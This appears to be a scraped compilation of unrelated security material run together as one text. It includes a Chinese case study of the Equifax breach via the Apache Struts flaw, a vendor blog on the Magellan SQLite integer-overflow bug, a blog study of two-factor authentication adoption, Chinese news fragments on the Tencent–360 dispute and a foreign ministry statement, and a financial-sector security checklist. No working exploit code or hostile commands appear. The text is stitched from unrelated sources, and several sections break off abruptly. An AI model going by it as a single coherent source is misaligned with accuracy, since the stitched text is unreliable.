2005年12月,Richard Smith被聘为Equifax的首席执行官(已于2017年数据泄露事件发生后退休),他上任后迅速启动了雄心勃勃的增长战略。2007年,Equifax以14亿美元收购了拥有1.4亿雇员记录的美国人力资源和薪酬服务公司TALX;2014年,以3.27亿美元收购了英国债务管理公司TDX集团;2016年,以19亿美元收购了澳大利亚领先的信贷公司Veda Group。Equifax总共收购了18家公司,这些收购使Equifax成为世界上最大的私人信用跟踪公司之一,积极的增长策略使Equifax的市值从2005年12月的大约38美元增加到2017年9月初的138美元。

然而大量的敏感信息使得Equifax成为黑客攻击的主要目标,姓名、出生日期、地址、社会保障号码、驾驶执照等,这些个人识别信息Personally Identifiable Information(简称PII)由于其潜在的高价值,在电信诈骗、金融欺诈、恐怖行动等其他犯罪中的有着重要用途,已成为网络犯罪世界中最有价值的商品之一。











公平信用报告法(FCRA),于1970年颁布,用以提高CRA保存的用户信息的准确性和隐私性。根据FCRA的规定,CRA必须维护一套程序,通过这些程序用户可以对其信用报告中不准确或不完整的信息进行纠正和申诉。为了遵守这一要求,Equifax为消费者提供三种途径来对信用报告中的信息进行申诉:电话、书面文件邮寄、在线服务(通过Equifax提供的一个门户网站)。Equifax在1970年建立了这套自动信用调查系统Automated Credit Investigation System (ACIS) 来处理用户的申诉。用户可以提交与其信用有关的文件副本,当Equifax收到申诉时,它会创建一个ACIS案件来跟踪信用调查过程。而整个数据泄露事件的导火索正是源自这个ACIS的门户网站。










除了向政府部门提供泄露通知外,企业还可能被要求向投资者披露网络安全风险和网络事件。在2011年10月,美国证监会SEC发布了一项指南:如果网络安全风险或安全事件对投资者“有足够的重要性”,企业可能被要求在注册、财务声明、8-K forms中披露这些信息。




Apache软件基金会收到了关于Struts(一个非常流行的Java Web应用程序框架)多个版本中发现的漏洞的第一份报告。一名安全研究员发现了该漏洞,并通过其安全邮件列表向Apache报告了该漏洞。


Apache Struts项目管理委员会(PMC)公开披露了Struts漏洞:攻击者可以利用文件上载功能向服务器发送恶意代码或命令。国家漏洞库NVD的影响分析表明,利用该漏洞进行攻击的复杂性很低,并且,在受损害的系统中,完全丧失机密性、完整性、可用性的可能性很大。根据评分标准,给出了10分的最高得分。Struts漏洞被广泛报道后,安全人员几乎立即观察到大量的攻击企图。一家公司观察到黑客试图使用简单的命令(whoami)以及更复杂的命令。在公布漏洞的同时,Apache Struts项目管理委员会也发布了修复该漏洞CVE-2017-5638 Apache Struts 2 S2-045的补丁。


图:NVD CVE-2017-5638 影响分析


国土安全部的计算机安全应急小组(U.S.-CERT)向Equifax发出了一份关于需要修补Apache Struts漏洞的通知。Equifax的多个人收到了US-CERT的邮件,其中包括全球威胁和漏洞管理(GTVM)小组和首席安全官Susan Mauldin(已于2017年数据泄露事件发生后退休)。


Equifax的GTVM小组对漏洞进行了通告,大约430个人和各种邮件组收到了邮件,邮件里指示公司负责Struts安装的人员需要将其升级到指定的Struts 2版本,并且强调“这个漏洞可以被利用,并且已证实目前正在被利用,因此该漏洞被列为严重风险,根据公司的安全策略需要在48小时内进行修补”。










在GTVM团队主持的月例会上,它们讨论了Apache Struts漏洞,会议的幻灯片指出,该漏洞目前正在被利用,并提醒负责Struts安装维护的人员将其升级到2.3.32或2.5.10.1版本。会议结束后,GTVM把这些幻灯片例行邮件发送给了430个在邮件列表里的人。






攻击持续了76天,然后才被Equifax的员工发现。原因是Equifax有安全设备可以监控到网络里的异常流量,包括它们之前更新了规则的入侵检测与防御系统。但是这些安全设备的前面还有一个SSL解密设备SSL Visibility (SSLV),用于将加密的流量解密后发给检测和防护系统进行分析识别。但是,在事件发生时,SSL解密设备上的证书已经过期了,根据设备的配置,证书过期不会影响流量的正常传输,但是却会影响入侵检测与防御系统,因为它们无法分析加密的流量。其中ACIS的域名ai.equifax.com的证书在2016年1月31号就过期了,也就是说在19个月之前,入侵检测与防御系统就已经无法检查ACIS的流量了。




晚上9:00点,Equifax的对抗小组将67个新的SSL证书上传到数据中心的 SSL Visibility (SSLV) 设备上,恢复了入侵检测与防御系统对流量的分析和识别。几乎就在同时,对抗小组马上就检测到来自其他国家的IP地址的可疑请求,通过分析,发现这些请求返回的流量大都超过10M,可能还包含了与信用调查有关的图像文件。对抗小组讨论后对这些IP进行了拦截。












Equifax的雇员告知CEO Smith,用户的PII很可能被盗。






Mandiant安全公司证实了有大量PII被攻击者访问,并与Equifax数据库所有者协调,以确定攻击者访问了哪些数据和受影响的个人,并且由于Equifax没有数据库所有者的列表,数据库中的某些数据也没有清晰的定义,使得这一过程非常具有挑战。与此同时,CEO Smith向Equifax董事会报告了这一泄露事件。







就在宣布的同时,公众反应就带来了一系列问题。之前建立的提供用户查询是否受到泄露影响的网站equifaxsecurity2017.com,由于 Equifax官方Twitter在拼写时不小心颠倒了单词顺序,将用户引导到了一个“钓鱼网站”(所幸,这个网站是由一个安全研究人员创建,目的并不是欺骗获取用户的信息)。同时,在一开始网站存在一些Bug和性能问题,导致用户每次查询的结果不同、或是网站处理速度很慢,以及注册免费的被盗保护服务时出现错误。虽然编码错误后来被解决了,但这进一步带来了用户公共关系的损害。临时搭建的客服坐席,由于训练和培训不足,虽然夜以继日的工作,还是没有达到应用的水平,导致客服被淹没在大量的用户咨询里。






Equifax宣布其CIO(David Webb,在Equifax工作7年)和CSO(Susan Mauldin,在Equifax工作4年)退休。


Equifax宣布CEO(Richard Smith,在Equifax工作12年)退休。


Equifax公司终止了高级副总裁、Equifax全球平台首席信息官(CIO for Global Corporate Platforms),Graeme Payne的职务。佩恩在数据泄露之前工作了近7年,且是一名评级很高的高管。公司解雇他的原因是,黑客攻击的ACIS系统在佩恩的管辖范围内,而他“未能转发2017年3月9日GTVM内部发布的修补Apache Struts漏洞的邮件” 。然而Payne认为这并不是自己的职责,他只是收到漏洞邮件430人中的一个,并且从来没有接到任何人的指示去转发这样的漏洞修复邮件,他也不是ACIS的系统所有者或者应用程序所有者。

三、失败点和反思 1.Equifax的IT组织结构存在诸多不合理




在泄露事件发生后,Equifax将CSO变更为首席信息安全官CISO,在2018年2月2日任命Jamil Farshchi为CISO,同时将CIO变更为首席技术官CTO,在2018年6月15日任命 Bryson Koehler为CTO,CISO和CTO都向CEO汇报。这些管理行动表明,公司现在认识到网络安全是一项核心的业务属性,让CISO和CTO加入到公司的高级管理团队,才可以用更有成效的协作方式开展安全工作。


图: Equifax的IT组织结构






















遗留技术既是安全问题,也是创新的障碍,遗留系统通常很难修补、监控或升级,所以带来了更高的安全风险。另一个遗留技术的风险是懂得操作和维护的雇员人数会不断减少,ACIS就运行在老旧的系统上,在数据发生泄漏时,公司能维护它的人只剩下几个了。ACIS运行在曾经的IT厂商Sun Microsystems公司的 “Sun servers”上,上面运行着Solaris操作系统。在一个更现代的系统中,有很多agent和扫描器可以方便地收集软硬件的信息,但是在这些老系统中,却缺乏这些工具的支持,使得扫描的效率变得很低、识别率也很差。












Equifax在泄露事件之后增加了IT和网络安全支出,2017年11月,公司临时首席执行官Paulino do Rego Barros表示,Equifax公司自发现泄露事件以来增加了四倍的安全支出。Equifax报告称2018年前9个月与这起安全事故有关的费用为2.215亿美元,包括技术和数据安全、法律和调查费用、产品赔偿等。


“你还能把安全部门做成盈利部门吗?安全部门力争盈利,让业务、销售部门怎么看” “安全本质还是守住核心业务;现在都为了盈利不要基本盘了” “甲方安全是守门员不是前锋,第一任务还是守门不是进球” “我们的一号目标就是不出现严重的安全事故” “不出事!”



Magellan and the Security Pitfalls of Third-Party Code

The Security Pitfalls of Third-Party Code As the web evolves, webpages are offering new powerful and interactive features Vulnerabilities in these features may allow remote attackers to run malware on your machine Bromium uses hardware-enforced isolation to protect against these attacks by design

The recent Magellan vulnerability in SQLite allows attackers to exploit affected applications and run malicious code on your machine. One such application is the Chrome browser, which uses SQLite as the backend for several of its components, including WebSQL. WebSQL allows any javascript-enabled webpage to run arbitrary SQL queries on your machine so if SQLite has a vulnerability, then malicious webpages can exploit it.

Unpacking the MagellanVulnerability

Though the Tencent Blade Team haven’t yet disclosed full details of the vulnerability, Zhuowei Zhang has already been able to reverse-engineer the fix to produce a Proof of Concept. With just a few lines of JavaScript, the demo webpage can crash the browser tab in affected versions of Chrome.

A quick look at a bit of the vulnerable SQLite code in the stack frame above the memcpy() crash:

Magellan and the Security Pitfalls of Third-Party Code

Note the integer comparison on the first line. This contains a classic integer overflow vulnerability, and that’s used by the proof of concept code. In a debugger:

Magellan and the Security Pitfalls of Third-Party Code

Notice the region of memory in blue, which is the same as the string in the PoC code:

Magellan and the Security Pitfalls of Third-Party Code

Also note the 0xFFFFFFFF (underlined in red); this is INT_MAX, so when the value of nSuffix (which is 2) is added to it, it results in an overflow, producing a negative result, so the comparison results in an erroneous skip of the early return.

A little more work would be required to exploit this, and even so, thanks to Chrome’s architecture, the attacker would have achieved Remote Code Execution only within the sandbox. If the attacker were able to additionally exploit some other vulnerability in the Chrome sandbox or the windows kernel, then they may be able to do more nefarious things such as install ransomware. There have been dozens of Chrome sandbox escapes over the years, and plenty more Windows kernel exploits that may be used.

The nastiest aspect of browser exploits is clearly that user interaction is not required. Bromium has been tracking an increase in Exploit Kit activity throughout 2018, and has noted a particular use of CVE-2018-8174 (IE Remote Code Execution) and Flash CVE-2018-4878 to deliver ransomware without user interaction. Even in the past few days, CVE-2018-8653 has reportedly been exploited to perform RCE in Internet Explorer.

One such infection vector that we see often, is when a user receives an email or tweet with a link to an infected website. This message can easily pass through all the layers of email security within the organization, as the destination is generally not known as malicious. Attackers frequently use websites of a small company or organization that has been compromised and is being used to host the attack, as this is less likely to arise suspicion of the security tools than if they had been using a newly registered domain.

Upon clicking the link, the website is immediately able to run the exploit, without any user interaction.

Bromium users are inherently protected against browser exploits like these, since we run each browser task in its own lightweight, hardware-isolated container . With Bromium, malware is separated from the host machine and other browser tabs, which allows us to continue execution of the malicious code with no risk to the user. In the Magellan demo it simply crashes the tab, and this is immediately fed back to our customer’s security team. For example, in the classic Proof of Concept with a calc.exe launching from IE the security team would see this:

Magellan and the Security Pitfalls of Third-Party Code

And with all malware, all process and network activity, filesystem and registry modifications, etc. will be captured and made available for analysis.

The fact that the Magellan bug was found in such a thoroughly-tested, widely-used library demonstrates that vulnerabilities are inevitable, and will continue to exist.

Bromium users remain protected because the attack unfolds inside the micro-VM container where it doesn’t actually matter what the malware does. With Bromium, the malicious code is completely isolated from the host operating system and is destroyed as soon as the user closes the browser tab. There’s nothing to steal, no way to move laterally, and no ability to persist.

If you want to learn more about Bromium Secure Platform ,contact us to request a demo.

Bromium bloggerMatthew Rowen also contributed to this post.

The bleak picture of two-factor authentication adoption in the wild


This post looks at two-factor authentication adoption in the wild, highlights the disparity of support between the various categories of websites, and illuminates how fragmented the two factor ecosystem is in terms of standard adoption.

Performing a longitudinal analysis highlights that the adoption rate of 2FA (two-factor authentication) has been mostly stagnant over the last five years, despite the ever increasing number of accounts hijacked due to the reuse of passwords found in data breaches and phishing attacks . Even more troublesome, looking at the type of 2FA offered reveals that some verticals, including some that have widely adopted 2FA, solely rely on custom two-factor solutions, instead of using two-factor standards, such as U2F/FIDO and TOTP .

The bleak picture of two-factor authentication adoption in the wild

Arguably, this behavior should be considered harmful to Internet ecosystem security, as it tends to create an unhealthy competition between sites to entice users to use different systems and install many apps. For example, as you can see in the screenshot above, HSBC and Blizzard Entertainment rolled their own proprietary two-factor software that requires you to install their app. They also use their own lingo and workflow e.g HSBC ask for a PIN to generate the TOTP code and call their software authenticator a secure key which is confusing to say the least. These practices certainly does not make it easy for users who have to learn the quirks of each system they enroll to.

In contrast, if every site were to use standardized two factors and a common language, once the users have installed a single app or bought U2F hardware dongles, they would be able to use them everywhere with a consistent user experience. In that ideal world, every site supporting 2FA would benefit from a virtuous snowball effect and user life would be a lot easier.

How we can help moving from the currently fragmented 2FA ecosystem to an ubiquitous standardized world is probably one of the greatest challenges that we face as a community.

The remainder of this blog post is organized as follows:

Methodology : How the data was collected and what are the study limitations. 2FA prevalence : A summary of how widely deployed 2FA is across the ~1200 sites analyzed. Adoption rate : A look at 2FA adoption rate over the last five years. Adoption by vertical : Teasing apart 2FA adoption by industry vertical. Type of 2FA offers : A delve into what type of 2FA (software, SMS, hardware, etc.) are the most commonly offered. Standard adoption : How widely adopted U2F and TOTP are for the sites that are offering 2FA.

Before diving into the results, let me briefly describe how the data was collected and analyzed.

The bleak picture of two-factor authentication adoption in the wild

To establish how many sites offers 2FA (two-factor authentication) and what kind of second factors are offered in the wild, I pulled the list of sites offering 2FA from dongleauth.info . To have historical perspective, I relied on the fact that the dongleauth.info git repo has been active since 2014 and pulled the list of sites as it was after the last git commit of each year from 2014 until 2017. Finally, I wrote a few python scripts to aggregate their yaml files and compute the statistics needed to create the charts that are used in this post ( raw results available here ).

Study limitations

Among the main limitations of this approach, it is obvious that it is not systematic - ideally, we would go through all of the top 1,000 sites and manually verify if 2FA is available and, if so, in which format and what language is used. Similarly, the examples used through this post are anecdotal: I didn’t do a formal analysis of the language used to describe 2FA across all sites. Finally, while there are a lot of studies that show consumers are picky on what app they install, there is no user research that directly shows that users are unwilling to install all the security app that are needed.

Study goal

That being said, this blog post is meant to be a conversation starter and raise awareness, rather than a full-blown research paper. In that context, I would argue that the data presented in this blog, which is used to support its claims, are good enough as the issues are so widespread that they are obvious whichever way you look at them. In particular, looking at the database coverage for the 2015 old version of Alexa top 1000 sites (the recent one can’t be downloaded since Amazon bought it) shows that the database covers 40% of the top 100 domains and 23% of the top 500 - this is not perfect, but it is more than enough to spot trends.

Future work

Moving forward, I agree that the community would benefit from a more rigorous study with clear recommendations that can be used as a reference by CISOs, CTOs, policy makers, and other key opinion formers. It is something that I hope we can do in 2019 - so, if you are interested in contributing, drop me a note!

With this out of the way, let’s delve into the study results.

How prevalent is 2FA authentication?
The bleak picture of two-factor authentication adoption in the wild

Overall, as of late 2018, 52.5% of the 1149 sites listed in the dongleauth database support 2FA. As we will see throughout this post, while having one site in two-supporting 2FA is good news, there is a lot of nuance behind this number that paints a somewhat grimmer picture.

Is 2FA adoption increasing?
The bleak picture of two-factor authentication adoption in the wild

To evaluate if the adoption rate of 2FA is increasing, I plotted the number of sites in the database at the end of every year since its inception (2014) and how many of those sites were marked as supporting 2FA. The resulting chart, visible above, shows that the trends don’t look great, while the number of sites supporting 2FA grew from 205 in 2014 to 603 in 2018 during the same period, the total number of sites in the database growing from 382 to 1149. This means that the ratio of sites supporting 2FA barely changed over the last four years: the adoption rate was 53.66% back in 2014, 48% in 2016, and back above 50% in 2017 (50.38%)

The bleak picture of two-factor authentication adoption in the wild

Now, one might argue that the main driver behind this stagnation is the fact that the dongleauth database grew by 300% over the last five years (~1200 up from 400) and that the newcomers are smaller/newer sites with less resources, which are, therefore, less likely to have 2FA. To test (and refute) this hypothesis,I looked at how much of the 2FA adoption growth was due to existing sites turning on 2FA. As visible in the chart above, turn out that very few sites that didn’t have 2FA from the get-go did adopt it after being added to the database. This leave us with the conclusion that:

In the recent year, the number of sites adopting 2FA has been mostly stagnant.

Understanding why sites don’t adopt 2FA and what can be done to incentivize them to do so are key questions that need to be answered, so that we can devise an effective global strategy that will ensure a steady adoption.

Support for various categories
The bleak picture of two-factor authentication adoption in the wild

Looking at the adoption of 2FA by site categories reveals that FINTECH- (financial technologies) and IT (information technology)-related services, such as cryptocurrency and cloud services, are leading the 2FA adoption charge. The sites related to services that predated the Internet, such as utilities, food, and transports, unsurprisingly, have the lowest amount of adoption. The most concerning part of this breakdown is that a few categories of sites that handle very sensitive user data, such as education (40.9%) and health (21%), have a very low adoption rate. This highlights the need, as a community, to help those sites jump on the 2FA bandwagon to better protect their user data.

Type of second factor supported
The bleak picture of two-factor authentication adoption in the wild

Looking at the type of 2FA supported across the board reveals that software based 2FA is by far the most widely supported second factor, with 82.1% of the sites supporting 2FA offering it. SMS, with 45.6%, is a distant second and hardware token is third, with only a 36.2% adoption rate. This breakdown is probably best explained by the fact that software-token systems are easier to implement and have no operational cost, whereas sending SMS/offering a hardware token does.

The bleak picture of two-factor authentication adoption in the wild

Obviously, the price argument is quickly becoming obsolete with the rise of the U2F hardware standard, as it allows any site to rely on security keys to do 2FA with a few lines of javascript . With webauthn and FIDO2 becoming mainstream in 2018, it will become easier than ever to offer a hardware 2FA. This is great news for user security, as U2F keys are the only type of second factor that can’t be phished, because the proof of ownership of the second factor is directly exchanged between the user key and the website.

The webauthn/FIDO2 standards will allow sites to offer unphishable hardware-based 2FA with just a few lines of javascripts.

However, all of this will only happen if sites indeed leverage standards and don’t invent their own version of second factors. This brings us to the last and probably most important part of the post, as it comes down to the future of 2FA: do websites follow standards?

2FA standard adoption

As I alluded to in the introduction, the key to getting more users to use 2FA is to have all sites offering two-factor options to be standardized. This would allow users to reuse their existing app and hardware tokens, instead of having sites competing to get users to install proprietary apps or buying single-site tokens (which is also bad for the planet).

The willingness of the industry to adopt standards is becoming even more crucial, as the next generation of hardware tokens FIDO2, which offer browser native UI, will hit the mainstream in 2019.

Before delving into adoption rate, let me briefly recap what standards exist and when they appeared, so that everyone is on the same page:

Software token : The industry standard for software-based 2FA are HTOP (“ HMAC based one time password ”) and TOTP (“ time-based one-time password ”). HOTP was standardized in the RFC 4226 in 2005 and TOTP in RFC 6238 in 2011 almost 10 years ago. The security risk associated with both protocol is that users need to input the code themselves which makes it phishiable. This security risk and ease of use what the driving reason for creating a hardware-based standard that didn’t requires user to input anything just touch a trusted device.
The bleak picture of two-factor authentication adoption in the wild
Hardware token : The standard for hardware tokens created by Google and Yubico is called U2F (universal second factor) and was released by the FIDO alliance in 2015. Its successor FIDO 2 developpement started in 2016. The main difference between U2F and FIDO2 is that FIDO2 has both a protocol to talk to hardware devices ( CTAP1 ) and a web API called webauthn that allows sites to use a native browser UI (as visible below) to prompt users to touch their key. Webauth is becoming mainstream with Chrome/Firefox/Edge support rolling out. You can test the native UI here .
The bleak picture of two-factor authentication adoption in the wild

Those standards, specially webauthn, offer the promise of a consistent user 2FA experience across the Internet, which, in the long run, is critical to having unphishiable accounts become the norm.

Standard overall adoption rate
The bleak picture of two-factor authentication adoption in the wild

Having reusable two-factors tokens/apps and an Internet-wide consistent experience is only possible if sites adopt standards - this is why measuring adoption prevalence and tracking is so important. As you can see in the figure above, the current plot adoption rate of standards across the industry is pretty bleak - only 11% of the hardware tokens follow the U2F/FIDO standard and 26.8% of the TOTP one.

While the lack of U2F support can be explained by the fact that it is relatively new and was not supported by all major browsers, the lack of support for TOTP is more concerning. The protocol has been around for close to a decade, there are countless apps on Android and OSX that support it, yet barely one in four sites support it. This shows the resistance of the industry to adopt standards, and, thus, calls for a large community effort to get sites to adopt the standard.

Language disparity
The bleak picture of two-factor authentication adoption in the wild

As pointed out by my friend Brad on top of not using standards, many websites use their own made-up language, which further increases user confusion about what to do for security. For example, as visible above, Paypal talk about registering the phone as security keys when it is in reality a SMS system. Twitter call 2FA login verification and Bank of America branded it SafePass and copyrighted the word… For more examples checkout the EFF article on the subject.

Adoption by industry
The bleak picture of two-factor authentication adoption in the wild

Breaking down the HOTP/TOTP support by industry-type reveals that industries that predate the internet era are the ones that are the least likely to adopt the standards. This raises the question of how the security community can engage with those industries and encourage them to participate in 2FA standardization. The chart below shows that problems with the adoption rate for the U2F standard is as pervasive and suffer the same lack of support that HOTP/TOTP.

The bleak picture of two-factor authentication adoption in the wild

To conclude, we are finally reaching the point where we have the technologies to offer users unphishable accounts with minimal friction and a consistent native UI across the Internet. It is up to us, as a community, to make sure that this doesn’t take 15 years to do, just like the deployment of HTTPS did. We need to engage the industry as a whole and get as many sites as possible, as quickly as possible, on the bandwagon to create a virtuous self-reinforcing circle, instead of a fragmented ecosystem.

A big thanks to Alexei , Aude, Brad and Christiaan for their feedback and insights -- this post wouldn’t be half as good without them.

Thank you for reading this blog post till the end! Don’t forget to share it, so your friends and colleagues can also learn about two factor authentication adoption in the wild. To get notified when my next post is online, follow me on Twitter , Facebook or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientt!







双方一度打得十分火热, 到了后来甚至出现用户装QQ的话,就不能用360,装了360就不能登录QQ的局面,尤其是后来,腾讯把QQ医生改成了QQ电脑管家,这摆明了是和360抢生意的,最要命的是腾讯还把QQ电脑管家和QQ绑定在了一起。










反观曾经跟他打过3Q大战的腾讯,虽然腾讯在游戏上饱受玩家诟病,但是,不可否认的是腾讯在创新方面是十足的,在QQ取得巨大成功后,又马不停蹄推出了自己的全新产品微信,后来又开始着实巩固自己的游戏平台,打造了一个又一个生态链。 返回搜狐,查看更多


美在网络安全上污蔑攻击中方 外交部:邪压不了正


中新网12月21日电 据“外交部发言人办公室”公众号消息,外交部发言人华春莹今日指出,针对美方在网络安全问题上的错误言行,中方已经第一时间表明了严正立场。我想告诉他们,谎言重复一万遍还是谎言。在这个世界上,最终邪压不了正。正义也许会迟到,但永远不会缺席。

美在网络安全上污蔑攻击中方 外交部:邪压不了正












此前,中国信息通信研究院发布的报告显示,2017年全球网络安全产业规模达到989亿美元,较 2016 年增长7.9%,预计2018年增长至1060亿美元。2017年我国网络安全产业规模达到439亿元,较2016年增长27.6%。




A Security Checklist for Financial Services Organizations


In the eyes of the cyberattacker, just about anything and everything out there is a target. But whether for the theft of personal and confidential information (such as passwords and PIN numbers) or having enough data about somebody to launch a covert identity theft attack down the road, their ultimate goal is one thing: to get money, and lots of it.

In this regard, one of the most vulnerable industries here in the United States is the financial industry. Despite being mandated by various federal legislations forcing financial institutions to improve their system of controls and audits, many of them are still are victims of cyberattacks.

In this article, we look at some of the major security topics that should be included in any checklist as a CIO or CISO make sure their financial institution is complying with federal legislation and mandates.

Note that for the purposes of this article, the term “financial institution” can mean any organization that handles money and related transactions for a customer. This includes banks, lending centers, brokerage institutions, stock and commodities trading firms and so forth.

The Checklist 1. Using Approved File-Sharing Programs

It’s obvious that many financial institutions, at least here in the United States, create and possess many documents. These can range from simple bank statements to confidential financial modeling data that the banks have to send over to the federal government for review and approval.

In order to electronically transmit these sensitive documents from one place to another, employees have to use file-sharing programs. Most financial institutions already provide this tool, which is supposed to have built-in security features. But employees, being creatures of habit, often like to use the software tools that they are accustomed to. Many of these tools send information as clear text across a network, which would make it very easy for the cyberattacker to intercept and hijack mission-critical information and data.

2. Train Employees to Recognize Phishing Emails and Social Engineering Attacks

Although many financial institutions have relatively good spam filter technology in place, there are still quite a number of attacks that get through, especially the phishing emails. The cyberattacker of today knows how to make these phishing emails look very convincing, enough so that a financial institution’s employee will fall for it, submit their private/confidential information and leave a door of opportunity open for the cyberattacker.

Social engineering attacks can also happen to any organization, but they are very prevalent at financial institutions, especially targeting the lower-ranking employees such as administrative assistants. The cyberattacker can sweet-talk one of these employees into divulging contact information that will later be used in a business email compromise (BEC) attack, which normally involves transferring a large amount of money to a fictitious bank account overseas.

3. Screen Your Third-Party Vendors

In an effort to save money, financial institutions often hire contractors from third-party vendors in order to carry out day-to-day tasks, especially when a deadline is looming. One of the best examples of this is the Comprehensive Capital Analysis and Review (CCAR), which takes place on a yearly basis at the top 30 banks in the United States.

These banks must provide documentation to the federal government that they will be solvent should another Great Recession (like the 2008 one) occur. This huge project involves the work of many people these banks are often understaffed for this project. They often wait until the last minute to hire third-party vendors to help out. The result of this is that these third-party vendors are not properly screened and vetted out, increasing the chances that there could be a rogue contractor among them.

4. Implement Safeguards to Avoid Data Loss

As mentioned before, information is vital for any financial organization, whether it’s customer data or just internal data. But in either case, it must be protected so that it does not fall into the hands of a cyberattacker. Examples of bad practices include the following:

Using a USB flash drive to store confidential information so that he or she can work from home Sending company documents or memos to a personal email address so that it can be more easily accessed by the employee Having their laptop stolen when it is being used in a public venue Tossing confidential financial documents into the trash

If it’s in your budget, it is highly recommended that you seek the help of an accounting firm or another cybersecurity firm in order to help you establish your set of data loss prevention controls and get regular audits.

Other common safeguards include securely deleting all data from discarded hard drives and shredding documents before disposing of them.

5. Make Sure That Only Company-Issued Devices Are Used by All Employees

It should be part of your organization’s security policy that employees must use company-issued devices (such as laptops and smartphones) for their work-related activities. They should be constantly reminded of this and the consequences if they do not follow through with this.

Under no circumstances should the employees be allowed to use their own smartphones to conduct work-related matters. This will greatly reduce the risks of what is known as “BYOD,” or Bring-Your-Own-Device. The primary reason for this is that company-issued devices will already have all security measures implemented into them to make sure that no confidential information and data is accessible to a cyberattacker.

It’s also important to conduct routine audits of these company-issued devices to make sure that the employees have not disabled or deleted any security-related applications that were installed onto them. This also includes all forms of communications. As mentioned previously, under no circumstances should personal email or social media accounts should be used to communicate messages that are sensitive in nature. Only authorized means of communications should be used, such as using only company email or an approved instant messaging application.

6. Make Sure That All Lines of Network Communication Are Secure for Remote Employees

Given that many employees like to work remotely, it is very important that your financial organization maintains the highest levels of security standards for remote login and network access. In this regard, you should implement the use of Virtual Private Networks (VPNs) between the employee’s laptop and the corporate servers. Also implement the use of two-factor authentication (2FA).

Apart from using the normal password, you could also consider using the RSA Security Token and biometric technology in order to fully authenticate a remote employee.

7. Make Sure That Your Entire IT Infrastructure Is Up to Date

This simply means that your entire IT staff has been trained and is keeping up with installing the latest firmware/software patches and any other relevant updates on all of the servers, workstations and mobile devices. It is important to keep a regular schedule of this and to be sure that the duties are distributed among various employees, not just one.

8. Be Sure to Implement a Strong Password Policy

Passwords are still the prime source of interest for the cyberattacker, especially at a financial organization. Therefore, it’s critical that you have a very strong password policy in place. This will of course mean that employees will have to create long and complex passwords, so in this regard, you should consider making use of a password manager application.

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